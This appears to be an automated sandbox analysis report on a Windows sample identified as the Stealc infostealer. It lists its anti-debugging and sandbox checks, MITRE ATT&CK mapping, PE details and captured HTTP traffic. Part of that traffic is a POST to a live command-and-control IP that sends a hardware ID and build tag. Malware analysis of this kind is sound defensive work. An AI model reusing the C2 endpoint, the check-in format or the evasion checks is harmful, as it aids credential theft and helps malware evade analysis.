              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E61BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00E61BF0
              Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.1389080982.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware+
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26033
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26180
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26189
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26077
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-26052
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E44A60 VirtualProtect 00000000,00000004,00000100,?1_2_00E44A60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E66390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E66390 mov eax, dword ptr fs:[00000030h]1_2_00E66390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E62AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00E62AD0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_00E646A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E64610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00E64610
              Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: G[Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00E62D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E62B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00E62B60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E62A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00E62A40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E62C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00E62C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpft100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpv9100%Avira URL Cloudmalware
              http://185.215.113.206/d9100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/d9file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206/c4becf79229cb002.phpftfile.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/wsfile.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/Hfile.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.phpRfile.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.php&file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpFfile.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/c4becf79229cb002.phpv9file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562132
                              Start date and time:2024-11-25 08:43:10 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 121
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.944066096598265
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'823'232 bytes
                              MD5:195eafa20236c52b744d7ff88ccf8dd6
                              SHA1:eb079dc207806442f57ef816f42f8b0a1835aa46
                              SHA256:110760d0807d24cda6139d69aee2e1166753ad3ee33e4f9751f3c036903838b4
                              SHA512:ed80f68b578faa2283bdd99e694e48eede8a98dbf94803e41134d0f9598eef032ae655be4582e492667daee2a4b46f5cec0c8083e653edd5eef828eadc1616a8
                              SSDEEP:49152:RARoaEikztxPzNJ8df19mgqtjsNuZJKCRFO:RAJNqxPpJ8df/Kg6KCR0
                              TLSH:578533CBA6F403DDC8DD64B68BDD86813FAAFD60C71D82B68A90323D94C27861DBD445
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xaa3000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F67790A2A5Ah
                              cmpxchg byte ptr [ebx], bl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, ch
                              add byte ptr [eax], ah
                              add byte ptr [eax], al
                              add byte ptr [ebx], cl
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+00h], ah
                              add byte ptr [eax], al
                              pop dword ptr fs:[eax+0000000Fh]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ebx], cl
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x162007592cd79d6255c408cc15c7d2fab6045unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x2b00x200bdbac752e1cbf59dcc07a57ad5d38c57False0.798828125data6.0509464530589785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x2b20000x200c40955d2b2b4135cdfce9877aad06867unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              olrcobvx0x4fe0000x1a40000x1a340008011c52ebefe937f00bd5310eb27ef8False0.9947689559108527data7.953678479680492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              fyiwyewh0x6a20000x10000x40068327c4823ca73fbde4e2fdeabb40999False0.7529296875data5.991552767790281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6a30000x30000x2200241f32430ccf65d51784ec58d3928017False0.042738970588235295DOS executable (COM)0.5543163031120827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x6a11880x256ASCII text, with CRLF line terminators0.5100334448160535

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-25T08:44:20.873510+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749710185.215.113.20680TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 25, 2024 08:44:18.846431971 CET4971080192.168.2.7185.215.113.206
                              Nov 25, 2024 08:44:18.965966940 CET8049710185.215.113.206192.168.2.7
                              Nov 25, 2024 08:44:18.966171026 CET4971080192.168.2.7185.215.113.206
                              Nov 25, 2024 08:44:18.967195034 CET4971080192.168.2.7185.215.113.206
                              Nov 25, 2024 08:44:19.086585999 CET8049710185.215.113.206192.168.2.7
                              Nov 25, 2024 08:44:20.405632973 CET8049710185.215.113.206192.168.2.7
                              Nov 25, 2024 08:44:20.405812979 CET4971080192.168.2.7185.215.113.206
                              Nov 25, 2024 08:44:20.408330917 CET4971080192.168.2.7185.215.113.206
                              Nov 25, 2024 08:44:20.527800083 CET8049710185.215.113.206192.168.2.7
                              Nov 25, 2024 08:44:20.873409033 CET8049710185.215.113.206192.168.2.7
                              Nov 25, 2024 08:44:20.873509884 CET4971080192.168.2.7185.215.113.206
                              Nov 25, 2024 08:44:23.423357010 CET4971080192.168.2.7185.215.113.206

                              HTTP Request Dependency Graph

                              • 185.215.113.206

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749710185.215.113.206807468C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 25, 2024 08:44:18.967195034 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 25, 2024 08:44:20.405632973 CET203INHTTP/1.1 200 OK
                              Date: Mon, 25 Nov 2024 07:44:20 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 25, 2024 08:44:20.408330917 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBG
                              Host: 185.215.113.206
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a
                              Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="hwid"2553E978FAD72284582127------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build"mars------IJECAEHJJJKJKFIDGCBG--
                              Nov 25, 2024 08:44:20.873409033 CET210INHTTP/1.1 200 OK
                              Date: Mon, 25 Nov 2024 07:44:20 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:1
                              Start time:02:44:14
                              Start date:25/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xe40000
                              File size:1'823'232 bytes
                              MD5 hash:195EAFA20236C52B744D7FF88CCF8DD6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
